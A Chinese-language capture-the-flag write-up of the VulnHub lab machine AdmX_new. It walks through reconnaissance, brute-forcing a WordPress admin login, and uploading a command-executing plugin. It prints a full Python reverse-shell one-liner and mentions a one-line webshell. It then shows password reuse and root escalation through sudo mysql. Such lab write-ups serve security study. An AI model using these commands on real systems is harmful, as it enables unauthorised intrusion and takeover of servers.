VulnHub靶机-AdmX_new | 红队打靶
2023-5-23 18:0:40 Author: 0x00实验室(查看原文) 阅读量:14 收藏

 声明:该篇文章仅供学习网络安全技术参考研究使用,请勿使用相关技术做违法操作。本公众号的技术文章可以转载,能被更多人认可本文的创作内容属实荣幸之至,请在转载时标明转载来源即可.也欢迎对文章中出现的不足和错误进行批评指正!

实战打靶系列第 04 篇文章 

靶机地址:

https://download.vulnhub.com/admx/AdmX_new.7z

一、主机发现

通过nmap进行主机发现

nmap -sn 192.168.56.0/24

靶机ip:192.168.56.108

kali的ip:192.168.56.102

二、对靶机进行信息收集

1、对靶机开放的端口,运行服务,操作系统的版本进行探测

nmap -sV -p- -O 192.168.56.108

image-20230519162602285

经历一段时间的等待,发现靶机只开放了80端口,跑的是apache的http服务;操作系统判断是Linux 4.15 - 5.6,或者Linux 5.0 - 5.4

2、对80端口进行一个nmap漏洞库的扫描

nmap --script=vuln -p80 192.168.56.108

image-20230519162725914

扫描结果显示有/wordpress和/wordpress/wp-login.php目录

3、使用浏览器对80端口进行访问

image-20230519162934514

访问的页面为apache的默认页面,没有信息可以利用,进行目录爆破

4、对80端口进行目录爆破,并进一步探测

gobuster dir -u http://192.168.56.108 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

image-20230519164405828

发现了两个目录,tools和wordpress,又再一次出现了wordpress,那么可以猜测这个网站是一个wordpress的cms搭建的,拼接tools访问,没有权限;凭借wordpress访问,发现的页面不像一个cms所拥有的页面,而且访问速度很慢;

image-20230519164649178

打开开发工具,对数据包进行检查

image-20230519164933787

发现数据包对192.168.159.145进行一个访问,访问的内容都是关于wordpress的一些js文件,而192.168.159.145不存在

会不会是之前在编写代码的时候,靶机的ip为192.168.159.145,但是现在靶机的ip改了,使用burp进行替换,将数据包的192.168.159.145换成192.168.56.108,需要将响应头和请求体都替换。

image-20230519174255802

浏览器重新访问80端口的wprdpress目录

image-20230519174335199

对wordpress目录进行目录爆破gobuster dir -u http://192.168.56.108/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

image-20230519174748511

发现有admin目录,指向wp-admin,那么拼接wp-admin进行访问

image-20230519174912513

来到后台地址,尝试一下弱口令admin admin

image-20230519175035881

提示密码错误,证明存在admin的用户名

三、获取初始shell


1、已知admin用户名,使用弱密码进行爆破

使用burp的自动批量发送进行爆破

image-20230519175936286

image-20230519175924468

利用返回长度去进行筛选

image-20230519180155978

密码为adam14

登录

image-20230519182236053

2、获取shell

wordpress的管理员后台有三个可以利用的地方:

a、media处的文件上传

b、appearance的theme editor修改外观主题,404模板,写入反弹shell,可以更新即可以利用

c、plugins上传插件(插件的默认位置url/wordpress/wp-admin/plugins/上传的插件名称)

这里先尝试后两个:

(1)、appearance的theme editor修改外观主题的404模板

先判断是否可以写入,尾部写入echo 123;

点击update file

发现不能修改文件,那么尝试第二种

image-20230519183230881

(2)、plugins上传插件

编写一个自定义插件,写入可以执行系统命令的代码,这里需要注意,编写wordpress的自定义代码需要加注释,这些注释必不可少,不然wordpress不会去执行;上传插件得进行压缩

image-20230519184652525

压缩 zip wordpress_plugin.zip wordpress_plugin.php

image-20230519185503799

上传插件

image-20230519184942199

image-20230519185544326

上传成功,点击activate plugin,插件的默认位置url/wordpress/wp-admin/plugins/上传的插件名称

访问这个插件:http://192.168.56.108/wordpress/wp-admin/plugins/wordpress_plugin.php?cmd=id

image-20230519185933486

输出了id

为什么不直接在插件里面写入反弹shell呢?因为不知道有没有可以利用的工具来进行反弹shell,不清楚是否有nc,python,bash等等,那么写入可以执行系统命令的代码,可以去查找是否存在这些工具。

存在nc,python3,bash

image-20230519190325492

image-20230519190345833

image-20230519190441738

方法一、使用python3进行反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

image-20230519190634371

image-20230519190650035

获得了初始shell

方法二、使用蚁剑连接shell

使用蚁剑连接,则插件里面的代码需要改成一句话木马

image-20230519201743545

蚁剑连接

image-20230519201638008

image-20230519201812784

四、提权

1、第一次提权(wpadmin)

当前用户www-date,sudo -l 没有不用root密码就可以执行的文件

image-20230519192440899

查看自动任务 cat /etc/crontab

image-20230519192553994

发现有定时任务,但是这个定时任务的目录下,发现有文件,但是没有权限

ls /home 发现home目录下有一个wpadmin用户

image-20230519193023431

在wordpress目录下有网站的配置文件,wp-config.php

image-20230519193226207

cat wp-config.php,  发现有数据库的密码和用户,那么尝试连接数据库

image-20230519193319526

mysql -u admin -p Wp_Admin#123,发现不能登录,结合前面信息收集,那么一共得到两个密码,使用这两个密码尝试去登录wpadmin用户

image-20230519193605647

image-20230519193908228

当尝试到adam14的时候,进入了wpadmin用户

2、第二次提权(root)

python3 -c 'import pty;pty.spawn("/bin/bash")'

提高交互性

image-20230519194237332

sudo -l 有可以提升权限的文件

image-20230519194326845

输入sudo /usr/bin/mysql -u root -D wordpress -p 进入数据库

image-20230519194440359

使用mysql自带的system命令

system id  发现为root用户

image-20230519194538910

system /bin/bash

提升为root权限

拿到flag

image-20230519194747555
参考资料:https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5MDY2MTUyMA==&mid=2247490039&idx=1&sn=83c3e8f0dfa3ead15eb41470f93dad8e&chksm=cfd86608f8afef1e4369f262418db4397fc7e9cd3c6bca34b3792dc3c6ce0236d576839f4c4f#rd
如有侵权请联系:admin#unsafe.sh